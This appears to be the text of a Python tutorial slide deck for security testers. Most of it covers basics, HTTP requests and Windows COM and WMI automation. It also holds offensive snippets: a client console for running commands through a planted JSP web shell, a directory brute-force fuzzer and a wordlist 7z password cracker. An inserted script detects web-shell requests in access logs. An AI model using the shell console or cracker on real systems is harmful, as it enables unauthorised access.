2. Why?
• EASY (install, learn, code)
• Tons of libraries
• Code is easy to understand
• Multiplatform
• Good for prototyping
3. History
• Conceived in the late 80s; first implementation in 1989
• Created by Guido van Rossum
• Benevolent Dictator for Life
• Currently there are two branches: 2.x and 3.0
4. Python 101
• Interpreted language
• Object oriented
• Indentation is significant in Python: it is the block delimiter.
• Usual control structures (if, while, etc.)
• Multiple levels of organization (functions, classes, modules, packages)
5. Who is using Python?
• Core Impact
• Canvas
• W3AF
• Sqlmap
• Impacket
• Google
• ImmunityDebugger
• Peach
• Sulley
• Paimei
• Scapy
• Spike Proxy
9. Python 101
• Interactive Python shell
• The commands execute line by line as you type
• Good for testing small pieces of code such as loops, regexes, etc.
• Type "python" and press Enter to access the shell
10. Python 101
• String indexes start at 0 and can also be negative
• msg[0] is H
• msg[-1] is d
11. Basic Code bits
import sys
ofile = "names.txt"
fil = open(ofile, 'r')      # 'r' to read; opening with 'w' would truncate the file
x = fil.readlines()
fil.close()
for y in x:
    print y
12. Urllib2
• Library to deal with HTTP
import urllib2
response = urllib2.urlopen('http://python.org/')
html = response.read()
print html
13. Basic fuzzer
import sys, urllib2
ofile = "dirs.txt"
fil = open(ofile, 'r')      # wordlist of directory names, one per line
dirs = fil.readlines()
fil.close()
for x in dirs:
    x = x.strip()           # drop the trailing newline before building the URL
    response = urllib2.urlopen('http://python.org/' + x)
    html = response.read()
15. Generic Console for Web Remote Execution
import httplib, urllib, sys
host = "XXXXXXXXXX"
while 1:
    cmd = raw_input("Exploited@" + host + "#>")
    if cmd == "exit":
        sys.exit()
    else:
        h = httplib.HTTP(host)
        cmd = urllib.quote(cmd)
        print cmd
        h.putrequest('GET', "/myconsole123/my-shell.jsp?pass=1231&cmd=" + cmd)
        h.putheader('Host', host)
        h.putheader('User-agent', 'Internet Explorer 6.0 ')
        h.endheaders()
        returncode, returnmsg, headers = h.getreply()
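The console on this slide leaves a distinctive trace in the web server's access log: every command is a GET to a .jsp with the command in the query string. As an added example (not from the original deck), this Python 3 script parses constructed Apache combined-format log lines and flags .jsp requests whose query string carries a command parameter; the sample lines, the parameter names and the log regex are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format access log lines (sample data, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2010:10:01:02 +0000] "GET /index.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2010:10:02:11 +0000] "GET /myconsole123/my-shell.jsp?pass=1231&cmd=whoami HTTP/1.1" 200 87 "-" "Internet Explorer 6.0 "
10.0.0.9 - - [12/Mar/2010:10:02:30 +0000] "GET /myconsole123/my-shell.jsp?pass=1231&cmd=ls%20-la%20%2Ftmp HTTP/1.1" 200 1640 "-" "Internet Explorer 6.0 "
10.0.0.7 - - [12/Mar/2010:10:03:00 +0000] "GET /search.jsp?q=cmd HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [ts] "method target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Query parameter names commonly used by a web shell to carry the command (assumed list).
COMMAND_PARAMS = ("cmd", "command", "exec")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_webshell_requests(log_text):
    """Return (ip, path, decoded command, user-agent) tuples for requests that look
    like web-shell command execution: a .jsp target whose query string carries
    one of COMMAND_PARAMS. A parameter *value* of "cmd" (last sample line) is not a hit."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        if not url.path.lower().endswith(".jsp"):
            continue
        params = parse_qs(url.query)      # parse_qs already percent-decodes values
        for name in COMMAND_PARAMS:
            if name in params:
                hits.append((rec["ip"], url.path, params[name][0], rec["ua"]))
    return hits


if __name__ == "__main__":
    for ip, path, command, ua in find_webshell_requests(SAMPLE_LOG):
        print("%s %s cmd=%r ua=%r" % (ip, path, command, ua))
```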
16. 7 Zip Cracker
import os, sys, pylzma
from py7zlib import Archive7z, NoPasswordGivenError, WrongPasswordError
pas = open('passwords.txt', 'rb')
password = pas.readlines()
pas.close()
for x in password:
    x = x.strip()           # drop the trailing newline from the wordlist entry
    try:
        fp = open('test.7z', 'rb')
        archive = Archive7z(fp, password=x)
        print "The password is " + x
        sys.exit()
    except Exception, e:
        fp.close()
17. A Web browser
#!/usr/bin/env python
import sys
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtWebKit import *
app = QApplication(sys.argv)
web = QWebView()
web.load(QUrl("http://www.edge-security.com"))
web.show()
sys.exit(app.exec_())
23. Win32Com
• Library that allows us to access COM objects on Win32 systems
• We can automate Word, Excel, PowerPoint, access WMI, AD, etc.
24. Massive printing
from win32com import client
import time
word = client.Dispatch("Word.Application")
def printPDFDocument(filename):
    word.Documents.Open(filename)
    word.ActiveDocument.PrintOut()
    time.sleep(5)           # give the print job time to spool before closing
    word.ActiveDocument.Close()
    word.Quit()
printPDFDocument("c:test.doc")
25. Excel Processing
from win32com.client import Dispatch
xlApp = Dispatch("Excel.Application")
xlApp.Visible = 1
xlApp.Workbooks.Open("test.xls")
for x in range(1, 100):
    nombre = str(xlApp.ActiveSheet.Cells(x, 5))   # column E of row x
    print nombre
xlApp.Quit()
26. WMI
import wmi
c = wmi.WMI()
for process in c.Win32_Process():
    print process.ProcessId, process.Name